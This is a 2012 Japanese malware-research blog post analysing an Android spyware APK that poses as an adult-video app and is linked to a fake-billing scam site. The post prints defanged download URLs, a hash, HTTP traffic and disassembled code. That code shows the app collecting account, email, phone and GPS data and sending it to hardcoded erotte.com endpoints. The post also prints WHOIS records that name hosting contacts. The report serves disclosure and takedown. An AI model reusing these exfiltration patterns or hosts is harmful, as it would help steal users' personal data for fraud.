金曜日, 2月 17, 2012

#OCJP-017: erotte.com(49.143.247.144)の架空請求詐欺のアンドロイド・マルウェアのアプリ発見!


このケースは「#OCJP-010 - bananaxxx.maido3.com(206.223.148.230)のアンドロイド・マルウェア発見!」 の続きですが、
同じマルウェアダウンロードサイトに新しい種類アンドロイドマルウェアを発見しましたので、別のレポートで報告させて頂きます。
本件のAndroidマルウェアは日本で作られたかと思われ、今回は日本にある架空請求詐欺サイトに連携があると確認しました。この件は犯罪かと思われ、きちんと対応をお願いしたいと思います。

さて、下記は本件のマルウェア説明となりす↓

■下記のサイトに↓

hxxp://www.14243444.com/appli02.php hxxp://14243444.com/appli02.php hxxp://206.223.148.230/~pj629g01/appli02.php hxxp://banana8310.maido3.com/~pj629g01/appli02.php hxxp://banana3247.maido3.com/~pj629g01/appli02.php

■下記のAndroidマルウェアが発見されました↓

アファイル  :「sp_k_test.apk」 マルウェア種類: スパイウェア マルウェア名 : Android/Application/Spyware/FakeTimer マルウェア機能: (Spyware)機能 説明     : 感染されたAndroidスマートフォンの情報を外に送る可能性ふぁある(Spyware)

■ウイルススキャン結果↓

MD5: 079b92df0da0e57c3dfcd5b8d0d2c82c File size: 78.2 KB ( 80119 bytes ) File name: sp_k_test.apk File type: ZIP DetectRatio: 6 / 43 AnalysisDate: 2012-02-16 21:07:55 UTC Resut: [CLICK]

■マルウェア情報

マルウェアのURLをクリックしたらAPKアプリインストーラーがダウンロードされます。 パソコンでダウンロードしたら何も起きないと思いますが、 Androidでダウンロードしたら、本マルウェアがインストールされる可能性があります。 インストールしたら見た目はアダルトビデオ関係のアプリアプリーと思われますが、 実は裏動きもありますので、Androidモバイルの情報を全てをアダルトサイトに送る事となります。 インストーラーはパソコンで見るとこんな感じです↓ 現在ダウンロードが出来ている状況です、下記はダウンロード証拠となります↓
--14:23:35-- hxxp://14243444.com/appli02.php => `appli02.php' Resolving 14243444.com... 206.223.148.230 Connecting to 14243444.com|206.223.148.230|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 80,119 (78K) [application/vnd.android.package-archive] 100%[===================================> ] 80,119 136.79K/s 14:23:36 (136.17 KB/s) - `appli02.php' saved [80119/80119]

ダウンロードした時のHTTPトラフィック↓

hxxp://14243444.com/appli02.php GET /appli02.php HTTP/1.1 Host: 14243444.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ja,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Fri, 17 Feb 2012 05:24:57 GMT Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8q PHP/5.3.8 mod_antiloris/0.4 X-Powered-By: PHP/5.3.8 Content-Disposition: attachment; filename=sp/k_test.apk Content-Length: 80119 Keep-Alive: timeout=10, max=100 Connection: Keep-Alive Content-Type: application/vnd.android.package-archive

パソコンで見たらファイルの情報は下記の様にです↓ APKインストーラーの中身はこんな感じ↓で、このベースでDISASSEMBLYをしました。 これからマルウェアの動きの説明となります、 先ずはマルウェアが色んなAndroidモバイルの個人情報を取られます。証拠↓ Androidアカウント情報を取られます↓ Main(373): invoke-static {p0}, ->get(Landroid/content/Context;)Landroid/accounts/AccountManager; Main(379): invoke-virtual {v7} ->getAccounts()[Landroid/accounts/Account; vew2(186): invoke-static {v0}, ->get(Landroid/content/Context;)Landroid/accounts/AccountManager; vew2(192): invoke-virtual {v7} ->getAccounts()[Landroid/accounts/Account; Androidメールアドレス情報を取られます↓ Main(550): const-string v3, "&m_addr=" vew2(385): const-string v3, "&m_addr=" Android電話番号情報を取られます↓ KitchenTimerService(25): .field private telno:Ljava/lang/String; KitchenTimerService(48): iput-object v0, p0, ->telno:Ljava/lang/String; Main(42): .field private telno:Ljava/lang/String; Main(98): iput-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String; Main(402):iput-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String; Main(538):const-string v3, "&telno=" Main(544):iget-object v3, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String; vew2(26): .field private telno:Ljava/lang/String; vew2(57): iput-object v0, p0, Lcom/example/android/service/vew2;->telno:Ljava/lang/String; vew2(215):iput-object v0, p0, Lcom/example/android/service/vew2;->telno:Ljava/lang/String; vew2(373): const-string v3, "&telno=" vew2(379):iget-object v3, p0, Lcom/example/android/service/vew2;->telno:Ljava/lang/String; Androidシステム情報を取られます↓ Main(167): invoke-virtual {p0, v3}, Lcom/example/android/service/Main;->getSystemService Main(332): invoke-virtual {p0, v0}, Lcom/example/android/service/Main;->getSystemService Main(343): invoke-virtual {p0, v0}, Lcom/example/android/service/Main;->getSystemService Main(365): invoke-virtual {p0, v0}, Lcom/example/android/service/Main;->getSystemService vew2(107): invoke-virtual {p0, v3}, Lcom/example/android/service/vew2;->getSystemService vew2(174): invoke-virtual {p0, v0}, Lcom/example/android/service/vew2;->getSystemService vew2(227): invoke-virtual {p0, v0}, Lcom/example/android/service/vew2;->getSystemService vew2(238): invoke-virtual {p0, v0}, Lcom/example/android/service/vew2;->getSystemService 組み合わせ全て情報を纏められました↓ 電話番号、メールアドレス、SSIDの盛り合わせて↓ GPSロケーションの情報↓ 外にあるサイトに送信させる↓ 外に送る動きの証拠↓ KitchenTimerService$1: const-string v4, "hxxp://erotte.com/check.php?id=" Main$2.smali(67): const-string v3, "hxxp://erotte.com/rgst5.php?gpsx=" vew2$1.smali(67): const-string v3, "hxxp://erotte.com/rgst5.php?gpsx=" vew2(363): const-string v3, "hxxp://erotte.com/send.php?a_id=" Main(528): const-string v3, "hxxp://erotte.com/send.php?a_id=" 上記のURLを開いたら下記のページを発見しました↓ ↑間違いなく、本件のアプリは架空請求詐欺のアプリです!

■詳しく詐欺サイトのIP/ドメインを調べたら、何処にあるのか分かります↓

$ date Fri Feb 17 16:09:26 JST 2012 $ host -ta erotte.com erotte.com has address 49.143.247.144

データセンター情報↓

ASNo: 18068 PREFIX: 49.143.240.0/21 AS Name: ACROSS Country: JP Domain: ACROSS.OR.JP ISP: DREAMWAVE SHIZUOKA CO. LTD

ドメイン情報↓

Domain Name: EROTTE.COM Registrar: GMO INTERNET, INC. DBA ONAMAE.COM Whois Server: whois.discount-domain.com Referral URL: http://www.onamae.com Name Server: 01.DNSV.JP Name Server: 02.DNSV.JP Registrant Name: Whois Protect Service Registrant Organization: GMO Internet Inc. Registrant Street1: 26-1 Sakuragaoka-cho Registrant Street2: Cerulean Tower 11F Registrant City: Shibuya-ku Registrant State: Tokyo Registrant Postal Code: 150-8512 Registrant Country: JP Registrant Phone: 03-0364-8727 Registrant Email: admin@onamae.com ↑お名前.COMで作ったドメインですね…

IP/サーバの情報↓

inetnum: 49.143.240.0 - 49.143.247.255 netname: Hypernet-Shizuoka descr: Dreamwave Shizuoka Co., Ltd. descr: SuzuyoInformation Bldg. 1F, descr: 22-1-5,Nakanogo,Shimizu-ku,Shizuoka-shi,Shizuoka,JAPAN country: JP inetnum: 49.143.247.128 - 49.143.247.191 netname: UPRIGHT descr: Upright Inc. country: JP admin-c: TY9472JP tech-c: KA4923JP a. [JPNICハンドル] TY9472JP b. [氏名] 谷 佑 c. [Last, First] Yu, Tani d. [電子メイル] tani@upr.ight.jp f. [組織名] 株式会社アップライト g. [Organization] Upright Inc. a. [JPNICハンドル] KA4923JP b. [氏名] 上倉 亨 c. [Last, First] Akira, Kamikura d. [電子メイル] kamikura@upr.ight.jp f. [組織名] 株式会社アップライト g. [Organization] Upright Inc.

PS: With special thank's to Mr. Kawakami for informing #OCJP!
----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック

1 件のコメント:

  1. 本件のケースがCLOSEになりました。
    お名前.COMのお陰でマルウェアURLを停止されました。
    ご協力を有難う御座いました!

    返信削除